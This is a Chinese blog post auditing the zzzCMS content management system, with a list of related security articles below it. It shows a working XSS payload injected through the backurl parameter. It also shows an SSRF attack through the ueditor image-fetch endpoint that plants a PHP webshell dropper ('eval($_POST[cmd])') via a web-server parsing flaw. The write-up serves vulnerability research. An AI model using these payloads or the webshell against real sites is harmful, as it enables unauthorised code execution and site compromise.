zzzCMS小计

最新推荐文章于 2022-03-03 20:15:31 发布
原创 最新推荐文章于 2022-03-03 20:15:31 发布 · 676 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了XSS跨站脚本攻击与SSRF服务器侧请求伪造两种网络安全漏洞,详细分析了其在实际应用中的表现形式及利用方式。通过具体案例,展示了如何通过构造恶意脚本和利用中间件解析漏洞,实现对目标系统的攻击。

XSS

路径:/plugins/template/login.php
在这里插入图片描述
url的值:

$url =conf('runmode')==1 ? $path.'index.php?location=user&backurl='.$backurl.'&act=' : $path.'?location=user&backurl='.$backurl.'&act=' ;

这里的$backurl 是我们可控的:

$backurl=getform('backurl','get');

另外还要注意到,这里 href 没有用双引号包裹住$url,这就导致我们只要用空格就能分离属性,构造出我们想要的属性,可以 F12 看一下源码:
在这里插入图片描述
我们要达到的目的:

<a href=/?location=user&backurl=test onmouseover=javascript:alert(1111) test=&act=login>

$backurl=test onmouseover=javascript:alert(1111) test=

弹框成功:
在这里插入图片描述

ssrf+中间件解析

漏洞文件:

/plugins/ueditor/php/controller.php

漏洞代码:
在这里插入图片描述
可以看到这一段接收用户输入的 url ,另外还有两个参数:
在这里插入图片描述
用户输入 upfolder 参数,为上传文件的路径,另外还有 action 要为 catchimage

我们可控的两个参数就是 actionupfolder,看一下对这两个参数有什么具体的过滤措施:

  • safeword(): 在这里插入图片描述
    函数过滤了其他符号,仅保留字母和数字

  • safe_url()
    在这里插入图片描述
    这里对 url ,保留输入的url中的 a-zA-Z0-9,.:=@?_\/\s]

然后再看看传输文件的函数 down_url()
在这里插入图片描述
在这里插入图片描述
重点看对 url 的过滤,函数没有对 ip和域名进行过滤,另外文件名和文件后缀来自于我们输入的 url ,保存的文件没有进行重命名,只是要求文件后缀不能为空,还有文件后缀必须在白名单内,看一下 conf()
在这里插入图片描述
可以看到我们不能看到合法的文件后缀,但是,可以看到与 controller.php 同目录下有个 config.json 文件,里面有一项:

"fileAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"],

简单地看了一下,一些危险文件后缀都被过滤掉了,于是直接制作图片木马(虽然手段很老了),文件内容:<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>,木马制作好放到自己的服务器上,然后在访问 contorller.php 发送请求,
在这里插入图片描述
这时候再访问:http://www.gohosts.com/upload/file/2.jpg/.php

然后就可以在/upload/file 路径下看到生成了一个 shell.php
在这里插入图片描述
查看 shell.php
在这里插入图片描述
可以看到写入 shell 成功。这里利用到了 nginx <8.03 和 IIS 7.0/7.5 中间件的解析漏洞。

zzcms接口index.php id参数存在SQL注入漏洞
shelter1234567的博客
02-08 729
zzcms接口index.php id参数存在SQL注入漏洞。ZZCMS 2023中发现了一个严重漏洞。该漏洞影响了文件/index.php中的某些未知功能,操纵参数id会导致SQL注入,攻击可能是远程发起的,该漏洞已被公开披露并可被利用。攻击者可通过sql盲注等手段,获取数据库信息。
zzcms2019存储型xss漏洞审(超详细)
Cvjark的博客
03-27 1313
存储型xss漏洞复现 function stripfxg($string,$htmlspecialchars_decode=false,$nl2br=false) { $string=stripslashes($string); if ($htmlspecialchars_decode==true){ $string=htmlspecialchars_decode($string);//转html实体符号 } if ($nl2br==true){ $string=nl2br($
zzzcms互联网商务建站系统 免费建站系统源码 asp建站系统源码 asp企业网站源码
07-19
zzzcms采用asp+access Utf-8进行开发,软件绿色且可直接使用,直接上传到空间内即可使用。 zzzcms就是要打造一款简单、易用、舒服的建站系统,zzzcms的管理系统处处为了让站长更节省时间,减少站长和管理员工作,在交互上尽量减少操作步骤,降低确认,返回,知道了等按钮的出现,并支持按键exc,ctrl+enter返回和提交功能。 集成好了自动关键词,自动描述,自动拼音,留言模块,会员模块,产品相册模块,百度地图模块,qq客服模块,自动静态,翻页样式,批量传图,批量加栏目等等,后续还会增加更多方便、实用的模块。 功能模块: 1.支持电脑端+手机端,支持无缝切换。 2.支持站内模糊搜索。 3.支持会员系统,找回密码,会员头像等。 4.支持内容会员权限功能。 5.集成两套qq客服,支持多个qq,多个电话,多个联系人。 6.支持全站自动静态,支持伪静态+静态缓存。 7.支持数据库备份、恢复功能。 8.支持session、cookie模式切换,香港空间不怕狂掉线了。 9.支持批量上传图片,自定义参数,自动关键词,描述,tag标签等。 10.支持上传文件管理,支持冗余检测。 11.支持模板切换、管理,在线模板。 12.支持插件热插拔,在线插件。 13.支持留言、管理员回复。 14.支持aspjpeg水印,支持png透明水印。 15.支持jmail邮件提醒,支持配置设定。 16.支持验证码开关。 17.支持批量添加栏目,支持无线级栏目。 18.支持栏目模型管理。 19.支持栏目模型自定义参数管理。 20.支持幻灯管理,幻灯数量和分组不限。 21.支持友情链接管理。 22.支持广告管理。 23.支持Tag标签。 24.支持自定义内容。 25.支持首页翻页。 26.支持百度地图标注,自动生成。 27.支持网站logo,手机logo,微信图片的上传。 插件功能: 1.会员投稿功能插件。 2.内链关键词功能插件。 3.筛选功能插件。 4.顶踩、赞一个、推荐功能插件。 5.全功能自定义表单插件。 6.评论插件
zzzcms免费开源建站系统含手机 v1.5.6 Build20190428.zip
04-05
zzzcms免费开源建站系统含手机 v1.5.6 Build20190428.zip
zzzcms免费开源建站系统含手机 v1.5.6 Build20190428
10-16
zzzcms采用ASP+ACCESS/MSSQL免费建站整站系统,所有源码开源完整,支持直接使用。zzzcms要打造一款最简单、最安全、最舒服的建站系统,zzzcms的管理系统处处为了让站长更节省时间,减少站长和管理员工作,在交互上尽量减少操作步骤,优化流程,并支持按键exc,ctrl+enter返回和提交功能,zzzcms功能和标签极其简单,方便记忆和编写。从1.4.0以后开始支持MSSQL数据库,从1.4.1开始支持短链接,从1.4.2开始支持伪静态。从1.5.0全新的开始,全新的体验zzzcms功能模块:1.支持电脑端+手机端,支持无缝切换,支持手机自动识别。2.支持站内模糊搜索,支持自定义搜索参数,支持搜索模型。3.支持会员注册、登陆、找回密码、点对点发短信,修改会员头像等。4.支持内容会员权限功能。5.内置三套qq客服,支持多个qq,多个电话,多个联系人。6.支持支持伪静态,静态,缓存,静态功能采用全自动模式。7.支持数据库备份、恢复功能,支持mssql备份还原。8.支持session、cookie模式切换,香港空间不怕狂掉线了。9.支持批量上传图片,自定义参数,自动关键词,
手机建站系统php,zzzcms免费开源建站系统含手机
weixin_42584507的博客
03-27 1098
zzzcms采用ASP+ACCESS/MSSQL免费建站整站系统,所有源码开源完整,支持直接使用。zzzcms要打造一款最简单、最安全、最舒服的建站系统,zzzcms的管理系统处处为了让站长更节省时间,减少站长和管理员工作,在交互上尽量减少操作步骤,优化流程,并支持按键exc,ctrl+enter返回和提交功能,zzzcms功能和标签极其简单,方便记忆和编写。从1.4.0以后开始支持MSSQL数据...
(环境搭建+复现)zzzcmsV1.7.5前台RCE
daxi0ng的博客
02-02 4038
0x00 简介 zzzcms是一款PHP语言开发的免费建站系统,以简单易上手的标签、安全的系统内核、良好的用户体验为特点,是站长建站的最佳选择。 0x01 漏洞概述 ZZZCMS一处远程代码执行漏洞。由于某些函数存在过滤不严格,攻击者通过构造恶意请求,可在无需登录的情况下执行任意代码,控制服务器。 0x02 影响版本 ZZZCMS 1.7.5 0x03 环境搭建 1、下载ZZZCMS 1.7.5 链接:https://pan.baidu.com/s/1uJ81idkgE38317F5jaze
精选资源
Zzzcms 1.75后台地址泄露
09-07
ZZZCMS parserSearch 远程命令执行漏洞和parserSearch 存在模板注入导致远程命令执行漏洞## **二、复现过程** 存在一个比较奇葩的文件直接将一些属于不可访问的zzz_config.php的内容直接给回显了,该信息泄露文件...
zzzcms免费开源建站系统含手机 v1.5.6 Build20190428-ASP源码.zip
01-26
zzzcms是一款基于ASP语言开发的免费开源建站系统,专为中小企业和个人用户提供便捷、高效的网站搭建解决方案。该版本为v1.5.6 Build20190428,意味着它在2019年4月28日进行了最后一次重大更新,包含了在此日期前的...
zzzcms商务建站系统 v1.3.3 Build20170122
12-02
zzzcms采用asp+access进行开发的建站系统源码,软件绿色可直接使用,直接上传到空间内即可。 zzzcms就是要打造一款简单、易用、舒服的建站系统,zzzcms的管理系统处处为了让更节省时间,减少和管理员工作,在交互上...
zzzcms商务建站系统 v1.2.6
12-05
zzzcms采用asp+access Utf-8绿色直接使用版,直接上传到空间内直接使用。 zzzcms就是要打造一款简单、易用、舒服的建站系统,zzzcms的管理系统处处为了让更节省时间,减少和管理员工作,在交互上尽量减少操作步骤,...
zzzcms免费开源建站系统含手机 v1.3.9 Build20170701
11-30
zzzcms采用asp+access进行开发的建站系统源码,软件绿色可直接使用,直接上传到空间内即可。 zzzcms就是要打造一款简单、易用、舒服的建站系统,zzzcms的管理系统处处为了让更
ZZCMS漏洞复现和代码审
qq_48511129的博客
01-25 9164
ZZCMS漏洞复现和代码审
zzcms SP3 漏洞解析
m0_46684679的博客
12-15 3995
zzcms SP3 漏洞解析 cms来源: ZZCMS SP3 URL: www.zzcms.com 作者:壮壮 很老的cms版本,应该没人会用了吧,这里找找简单地漏洞 有使用seay扫描器扫描,但误报率高,只能简单的参考,实际还是得自己动手看代码(…) 1.xss储存型漏洞 范围:Book.php留言界面 测试后: 有轻微的参数过滤痕迹,但并不完全,还是能简单的在管理页面执行恶意xss代码 恶意代码js: <IMG SRC="javascript:alert(1);"
代码审轻松拿下CNVD证书
weixin_43460070的博客
04-21 2171
CSU小学弟终于在前些日子拿到了自己的第一个CNVD证书,写此文章留作纪念 一、版本及官网概述 ZZCMS是专门帮助企业建立招商系统的一个CMS,此次出现问题的是ZZCMS201910和zzcms2020这两个版本(其他的版本我还没有具体去看),此cms的官网为http://www.zzcms.net/ 在admin目录下的tag.php出现了漏洞 二、漏洞发现过程分析 Tag.php 38-62行 67-77行 我们传入相应的参数直接进入showtag这个方法里面 接下来开始分析showtag()这
phpinfo函数无法执行_再谈 zzzcms 代码执行,你也能审出来的高危漏洞
weixin_39631350的博客
12-21 441
本文作者:sher10ckzzzcms 的后台模板处的命令执行可以说是这套 CMS 比较典型的漏洞了,很久之前自己跟踪过一遍漏洞代码,最近又拿起来玩了玩,发现自己也能够审到这个漏洞点,整个漏洞审的过程也很简单,没有啥骚操作。下面我就会按照审的思路,而并非漏洞分析的思路,给大家说说我是如何通过自己的努力审出这个命令执行漏洞的cms 下载地址:https://yunpan.360.c...
(环境搭建+复现)74CMS模版注入+文件包含getshell
daxi0ng的博客
12-22 5040
0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 0x02 影响版本 骑士 CMS < 6.0.48 0x03 环境搭建 1、下载最新版74cms。 https://www.74cms.com/downlo
zzcms8.2 用户修改密码漏洞
xdjxi的博客
03-03 4576
既然注册的地方存在逻辑漏洞,未对图形验证码做任何防护。那大胆猜测一下,找回密码处也存在漏洞 好的,抓包 这是找回密码的界面,很简单,就一个图形验证,但刚刚已经发现,注册的地方图形验证好像也没什么用,那估这里也一样。 继续下一步 发现需要验证码,但是邮箱地址是假的啊,上哪找去,emmm,在经过了一般思考后,我决定先把每一步用burp抓包看一下,然后发现它返回的包是这样的 这是一个JavaScript代码 题外话:刚刚检测用户是否存在也是这个提示,或许待会可以试试用户注册重置 先..
zzzcms
最新发布
05-26
### ZZZCMS概述 ZZZCMS 是一款基于 PHP 和 MySQL 的开源内容管理系统 (CMS),旨在帮助开发者快速构建网站并管理其内容[^1]。它提供了丰富的功能模块以及友好的用户界面,适合中小型企业的官方网站建设。 以下是...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值